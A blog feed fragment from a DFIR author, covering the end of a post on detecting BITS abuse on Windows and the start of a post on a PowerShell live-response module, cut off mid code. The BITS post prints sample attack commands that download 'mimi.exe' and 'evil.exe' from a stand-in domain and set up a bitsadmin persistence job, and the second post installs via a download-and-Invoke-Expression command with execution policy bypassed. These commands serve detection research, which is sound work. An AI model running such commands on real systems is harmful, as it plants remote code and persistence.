&lt;p&gt;In short that means BITS fits the profile as a candidate for attackers “living off the land”. Managed via a COM based API, Powershell or a built in binary (bitsadmin.exe), BITS can be used easily throughout the attack lifecycle.&lt;/p&gt;

&lt;p&gt;For those interested in digging further, I have included some detailed links on capabilities and configuration in my references below.&lt;/p&gt;

&lt;h3 id=&quot;artefact-creation&quot;&gt;Artefact creation&lt;/h3&gt;
&lt;p&gt;Most of my testing has been working with BITS 5.5 in Windows 8.1, however the content below was tested on Windows 7 through 10.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-powershell&quot; data-lang=&quot;powershell&quot;&gt;&lt;span class=&quot;c&quot;&gt;# Bits download initiated via Powershell&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;PS&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Start-BitsTransfer&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Source&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;http://www.totallylegitinappnews.com/mimi.jpg&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Destination&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;c:\Windows\vss\mimi.exe&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;

&lt;/span&gt;&lt;span class=&quot;c&quot;&gt;# Peristence via bitsadmin.exe&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;CMD&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;bitsadmin&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;/create&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;backdoor&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;CMD&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;bitsadmin&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;/addfile&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;backdoor&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;http://www.totallylegitinappnews.com/evil.exe&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;  &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;c:\windows\VSS\evil.exe&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;CMD&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;bitsadmin&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;/SetNotifyCmdLine&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;backdoor&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;c:\Windows\VSS\evil.exe&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;CMD&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;bitsadmin&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;/resume&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;backdoor&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;I have shown some really simple examples above to generate artefacts, however in the wild there are also several attack tools that make building stealthy download cradles trivial. Please see references for more information.&lt;/p&gt;

&lt;h3 id=&quot;collection---network&quot;&gt;Collection - Network&lt;/h3&gt;
&lt;p&gt;Network is by far the easiest collection point via typical web traffic filtering on user agent string and whitelisted domains. Although I have found everything from Windows, to application, to news traffic, with most BITS traffic is fairly static over time. I have found interesting use cases baselining current activity then spotting deviations from normal focusing on content, http method, destination and URL.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/01pcap.png&quot; width=&quot;500&quot; /&gt;&lt;/div&gt;

&lt;p&gt;Limitations in some environments are the obvious here: encrypted traffic. This method will also miss BITS setup with notification command line and not reaching out of the network.&lt;/p&gt;

&lt;h3 id=&quot;collection---endpoint&quot;&gt;Collection - Endpoint&lt;/h3&gt;
&lt;p&gt;Endpoint is by far the most detailed collection point, but generally the most difficult to master. I have broken out the endpoint into various sections to provide insights. “Defending off the land”, my goals are to find a lightweight collection capability to pull into a scripted solution without pre installation or change of audit policy. Unfortunately, that means probably the most valuable detection points: event monitoring via EDR, Sysmon and EventID 4688 (Process Creation + CLI) events are out, however some of the artefacts can be collected via EDR tools.&lt;/p&gt;

&lt;h1 id=&quot;bits-job-configuration&quot;&gt;Bits job configuration&lt;/h1&gt;
&lt;p&gt;BITS can be configured and jobs reviewed using either Powershell command-lets or bitsadmin.exe. Limitations on this type of collection are: unless collected during the transfer, only scheduled jobs are available.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/02powershell.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;p&gt;In my testing, both methods provide similar granular information on job details, however Bitsadmin does provide additional context. In my example below you can see additional configuration of the notification command line feature, also bypassing Autoruns detection.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/03powershell.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h1 id=&quot;qmgr-database&quot;&gt;QMGR database&lt;/h1&gt;
&lt;p&gt;Queue Manager queues store job specification and state. Typically located at: C:\ProgramData\Microsoft\Network\Downloader. For pre-Windows 10 systems, QMGR is stored in files named qmgr0.dat or qmgr1.dat.&lt;/p&gt;

&lt;p&gt;Limitations are: Microsoft has migrated to ESE database format for Queue Manager in Windows 10 and beyond leaving with a solution that would only work on some current systems.&lt;/p&gt;

&lt;p&gt;These are the files parsed by the ANSSI tool - bits_parser. Initially I toyed with the idea of a light weight binary parser in Powershell, to replicate bits_paser in non carving mode and roll in seperate capability for Windows 10.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/04bitsparser.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;p&gt;Results worked but led me to the second limitation: visibility is focused on scheduled or recent jobs. Thats is great for the BITS persistence use case but single BITS tasks can rotate out of the Queue Manager quickly and may not be recoverable even with carving. Assuming available data, I also found carving in Powershell was too resource intensive for a light weight collection so the preferred method would be to collect and parse offline if carving is required.&lt;/p&gt;

&lt;p&gt;Windows Event logs
Focusing on default event logs, the best source for detection of malicious download is the Microsoft-Windows-Bits-Client/Operational log. These logs hold: state, source, user and some file information for each BITS transfer. This event log also appears to be similar across Windows 7 through 10 so fits the profile and a good endpoint collection source.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/05eventlogs.png&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;

&lt;p&gt;Limitations include: sparse data, logs are spread over several EventIDs and potentially a lot of entries in a production environment making it difficult to spot evil hiding in the noise. This log will also not shed light on abuse of BITS for persistence unless there was a network transfer to a suspicious domain as part of the configured job.&lt;/p&gt;

&lt;p&gt;Writing a script to pull all EventID 59 events, highlighting some of the available information from the event: Time (converted to UTC), JobName and Source URL we can see the kind of noise to expect in a few hours activity.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/06bitsdetectall.png&quot; alt=&quot;Parsing eventlogs for detection&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Following similar concepts to network based detection, I was able to build a whitelist for common domains from my network logs and whitelist out most of the noise potentially seen day to day.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/07bitsdetect.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;p&gt;This method may be particularly helpful in environments that may have limitations on network encryption visibility. Some work is required to build out the whitelist with lots of outliers in a large network.&lt;/p&gt;

&lt;p&gt;My content is &lt;a href=&quot;https://github.com/mgreen27/Invoke-BitsParser&quot;&gt;available here&lt;/a&gt;. Some of the other features I have added are:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Configuration of days back to search (default 14).&lt;/li&gt;
  &lt;li&gt;A switch (“-All”) to list all entries available in the logs to collect data to rejig whitelists from an endpoint view.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h3&gt;
&lt;p&gt;I couldn’t finish this post without talking a little about capabilities all organisations should aspire to. Gold standard should be a mix of network and endpoint based visibility, with the ability to cover all gaps from each single source.&lt;/p&gt;

&lt;p&gt;Critical for a modern blue team, some of my recommendations are:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Network based visibility around encrypted web traffic with content inspection.&lt;/li&gt;
  &lt;li&gt;Process command line visibility on the endpoints to spot evil process chains and unusual command lines or obfuscation that is abnormal for the environment.&lt;/li&gt;
  &lt;li&gt;Process module load visibility to spot unexpected functionality loaded.&lt;/li&gt;
  &lt;li&gt;Process network activity to unexpected locations is also a good method to increase the scope of detection on the endpoint and provide additional context to network detections that may have visibility limitations.&lt;/li&gt;
  &lt;li&gt;Spotting disk or registry write events out of normal activity and having context of associated process. Why is svchost.exe writing evil.exe to c:\Windows\VSS?&lt;/li&gt;
  &lt;li&gt;Ability to execute adlib collections to answer questions of the environment.&lt;/li&gt;
  &lt;li&gt;Upgrading to Powershell version 5 for Powershell script block visibility.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I hope this post has provided some good food for thought and pointed anyone interested in the direction for further research and reference material. Feel free to reach out if you have any questions.&lt;/p&gt;

&lt;h2 id=&quot;references&quot;&gt;References&lt;/h2&gt;
&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;ANSSI. &lt;a href=&quot;https://github.com/ANSSI-FR/bits_parser&quot;&gt;Bits_Parser&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Azouri, Dor. &lt;a href=&quot;https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Dor%20Azouri/DEFCON-25-Dor-Azouri-BITSInject-WP.pdf&quot;&gt;BITSInject&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Bohannon, Daniel. &lt;a href=&quot;https://github.com/danielbohannon/Invoke-CradleCrafter&quot;&gt;Invoke-CradleCrafter&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Geiger,Matthew. &lt;a href=&quot;https://www.dfrws.org/sites/default/files/session-files/pres-finding_your_naughty_bits.pdf&quot;&gt;Finding Your Naughty BITS&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Hexacorn. &lt;a href=&quot;http://www.hexacorn.com/blog/2017/07/12/beyond-good-ol-run-key-part-64/&quot;&gt;Beyond Good Old RUn Key part 64&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Microsoft. &lt;a href=&quot;https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753856(v=ws.11)&quot;&gt;Bitsadmin documentation&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Microsoft. &lt;a href=&quot;https://github.com/MicrosoftDocs/windows-powershell-docs/tree/master/docset/windows/bitstransfer&quot;&gt;Powershell Bitstransfer documentation&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Microsoft. &lt;a href=&quot;https://msdn.microsoft.com/en-us/library/windows/desktop/ee663885(v=vs.85).aspx&quot;&gt;Using Windows Powershell to create BITS Jobs&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;O’Day, Dan. &lt;a href=&quot;https://github.com/danzek/annotationis/blob/master/Operating%20Systems/Windows/BITS.md&quot;&gt;BITS annotationis&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Secureworks, Counter Threat Unit. &lt;a href=&quot;https://www.secureworks.com/blog/malware-lingers-with-bits&quot;&gt;Malware Lingers with BITS&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

</description>
        <pubDate>Sun, 18 Feb 2018 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2018/02/18/Sharing_my_BITS.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2018/02/18/Sharing_my_BITS.html</guid>
        
        <category>DFIR</category>
        
        <category>BTIS</category>
        
        <category>Powershell</category>
        
        <category>LiveResponse</category>
        
        <category>IR</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Invoke-LiveResponse</title>
        <description>&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/00PowerShellthumb.png&quot; alt=&quot; &quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;invoke-liveresponse&quot;&gt;Invoke-LiveResponse&lt;/h2&gt;
&lt;p&gt;In this post, I am going to talk about a Powershell module I have authored as a simple 
implementation for live response and file collections over Powershell remoting. The initial use case was considered after an endpoint vendor appliance failed and capability for raw collections was limited. The module uses Powerforensics over WinRM, and after some interest, I think is worth sharing.&lt;/p&gt;

&lt;p&gt;Some of the areas I will cover are:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Background.&lt;/li&gt;
  &lt;li&gt;Requirements and setup.&lt;/li&gt;
  &lt;li&gt;Module switches and configuration.&lt;/li&gt;
  &lt;li&gt;Performance tweaks.&lt;/li&gt;
  &lt;li&gt;Forensic Footprint over WinRM.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The goal of this project was to promote Powershell as a blue team tool and improve my Powershell knowledge with research.&lt;/p&gt;

&lt;p&gt;Github: &lt;a href=&quot;https://github.com/mgreen27/Powershell-IR&quot;&gt;https://github.com/mgreen27/Powershell-IR&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;background&quot;&gt;Background&lt;/h3&gt;
&lt;p&gt;The ability to collect live response data from a remote system is a fundamental requirement for modern incident response. Rouge processes, code injection, suspicious network activity or other disk and memory artefacts are some of data points an analyst may look for signs of evil. The ability to collect these data points quickly, enables informed decisions and reduces risk of loss from an incident. Some of the difficulties in accessing these artefacts include lack of endpoint visibility or capabilities for ad-lib collection, from either a technical or business limitation.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/02powerforensics.png&quot; /&gt;&lt;/div&gt;

&lt;p&gt;PowerForensics is a disk forensic framework for Powershell written in C# by Jared Atkinson. Typical use case is local analysis from a traditional collection enabling the analyst to perform detailed disk forensics similar to the more well known Sleuth Kit. Powerforensics can also be used for similar tasks over Powershell remoting.&lt;/p&gt;

&lt;p&gt;In offensive security, one of the biggest enablers in Powershell is the capability to reflectively load PE files, shellcode and assembly into memory. That means security tools can be loaded from a Powershell script, in some cases never touching disk. The same techniques can be used by the Blue Team and quite a few practitioners are starting to use this feature for things like memory and volatile data forensics. Powerforensics enables the capability for remote raw disk analysis using Assembly.Load Method.&lt;/p&gt;

&lt;p&gt;Invoke-LiveResponse is the result of converting some scripts for raw collection with redirected acquisition and live response into an easy to use tool. During use, I have tweaked some performance and learnt a lot in implementation about both Powershell and Powerforensics.&lt;/p&gt;

&lt;h3 id=&quot;requirements&quot;&gt;Requirements&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;Powershell 4.0 or above collector machine (3 should also be functional).&lt;/li&gt;
  &lt;li&gt;Powershell 2.0 or above target machine/s.&lt;/li&gt;
  &lt;li&gt;Powerforensics installed in running user Powershell Modules path (I have included automatic installation below).&lt;/li&gt;
  &lt;li&gt;WinRM setup with Kerberos and/or Negotiation authentication.&lt;/li&gt;
  &lt;li&gt;SMB Network share with write access (for file collections).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;setup&quot;&gt;Setup&lt;/h3&gt;
&lt;p&gt;On a Powershell 4+ collector machine, assuming you trust me, run the following proxy aware powershell commands to download then install. The install places Invoke-LiveResponse into the running users profile.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-powershell&quot; data-lang=&quot;powershell&quot;&gt;&lt;span class=&quot;c&quot;&gt;# Proxy aware download install of Invoke-LiveResponse&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Set-Executionpolicy&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-ExecutionPolicy&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;bypass&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-force&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$url&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;https://raw.githubusercontent.com/mgreen27/Powershell-IR/master/Get-Forensicating.ps1&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$WebClient&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;New-Object&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;System.Net.WebClient&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$WebClient&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Proxy&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;no&quot;&gt;System.Net.&lt;/span&gt;&lt;span class=&quot;kt&quot;&gt;WebRequest&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]::&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;GetSystemWebProxy&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$WebClient&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Proxy&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Credentials&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;no&quot;&gt;System.Net.&lt;/span&gt;&lt;span class=&quot;kt&quot;&gt;CredentialCache&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]::&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;DefaultNetworkCredentials&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Invoke-Expression&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$WebClient&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;DownloadString&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$url&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;

&lt;/span&gt;&lt;span class=&quot;c&quot;&gt;# Once installed run to load&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Import-Module&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Invoke-LiveResponse&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;

&lt;/span&gt;&lt;span class=&quot;c&quot;&gt;# View help&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Get-Help&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Invoke-LiveResponse&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-detailed&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;h3 id=&quot;winrm&quot;&gt;WinRM&lt;/h3&gt;
&lt;p&gt;I recommend setting WinRM up via Group policy for simplified deployment across all Powershell versions. Please see the resource section for some good resources and a detailed walkthrough, including a previous post of mine in setting up a lab.&lt;/p&gt;

&lt;p&gt;For a quick and dirty install, Invoke-StartWinRM will turn on PSRemoting and configure appropriate credential configurations on Powershell 3 machines and above. Similarly, Invoke-StopWinRM may also be used to revert changes.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/03invoke-startwinrm.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h3 id=&quot;credential-risk&quot;&gt;Credential Risk&lt;/h3&gt;
&lt;p&gt;To minimise credential risk, CredSSP (and any basic) authentication over WinRM should always be disabled. This results in a network logon type 3 and protected credentials of the account running WinRM. The drawbacks here means our SMB share for copy use cases requires unauthenticated write access or credentials passed into the script at runtime. As share credentials will be pushed to the endpoint, best practice would be to create temporary account/access to our share for the duration of our redirected file acquisition.&lt;/p&gt;

&lt;h3 id=&quot;memory&quot;&gt;Memory&lt;/h3&gt;
&lt;p&gt;Powershell has a configuration option to restrict the amount of memory available in a shell. This value is called MaxMemoryPerShellMB, and depending on Powershell version may be set in both Shell and Plugin WSMan configurations. In Powershell 2.0, the default is 150MB, which will likely need to be increased or turned off. As later versions of Powershell have been released, the default values have risen appropriately for most WinRM use, for example in 3.0 MaxMemoryPerShellMB = 1024, which is multiples above required memory.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-powershell&quot; data-lang=&quot;powershell&quot;&gt;&lt;span class=&quot;c&quot;&gt;# To view this setting locally&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Get-Item&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;WSMan:\localhost\Shell\MaxMemoryPerShellMB&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Get-Item&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;WSMan:\localhost\Plugin\Microsoft.PowerShell\Quotas\MaxMemoryPerShellMB&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;

&lt;/span&gt;&lt;span class=&quot;c&quot;&gt;# To edit this setting locally&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Set-Item&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;WSMan:\localhost\Shell\MaxMemoryPerShellMB&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Value&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Force&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Set-Item&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;WSMan:\localhost\Plugin\Microsoft.PowerShell\Quotas\MaxMemoryPerShellMB&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Value&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Force&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;The simplest approach is to deploy WinRM via Group policy and configure these settings via GPO or logon script. For manual intervention, Invoke-MaxMemory will connect via WinRM and turn off this setting (set to 0). Powershell 2.0 has restrictions in remotely changing WinRM settings, although not ideal from a forensic standpoint, the “–Legacy” switch uses scheduled tasks to force a local configuration change.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/05Maxmemory.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h2 id=&quot;invoke-liveresponse-1&quot;&gt;Invoke-LiveResponse&lt;/h2&gt;
&lt;p&gt;The current scope of Invoke-LiveResponse is a live response tool for targeted collection. There are two main modes of use in Invoke-LiveResponse and both are configured by a variety of command line switches.&lt;/p&gt;

&lt;h3 id=&quot;forensiccopy&quot;&gt;ForensicCopy&lt;/h3&gt;
&lt;p&gt;Configured by simple command line switches, Invoke-LiveResponse enables file collection from a remote machine over WinRM.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Reflectively loads Powerforensics onto target machine to enable raw disk access.&lt;/li&gt;
  &lt;li&gt;Leverages a scriptblock for each configured function of the script.&lt;/li&gt;
  &lt;li&gt;Common forensic artefacts and custom file collections.&lt;/li&gt;
  &lt;li&gt;Depending on the selected switches, each selected capability is joined at run time to build the scriptblock pushed out to the target machine.&lt;/li&gt;
&lt;/ul&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-powershell&quot; data-lang=&quot;powershell&quot;&gt;&lt;span class=&quot;nf&quot;&gt;PS&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Invoke-LiveResponse&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-ComputerName&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;WinRMtester&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Credential&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Domain&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span 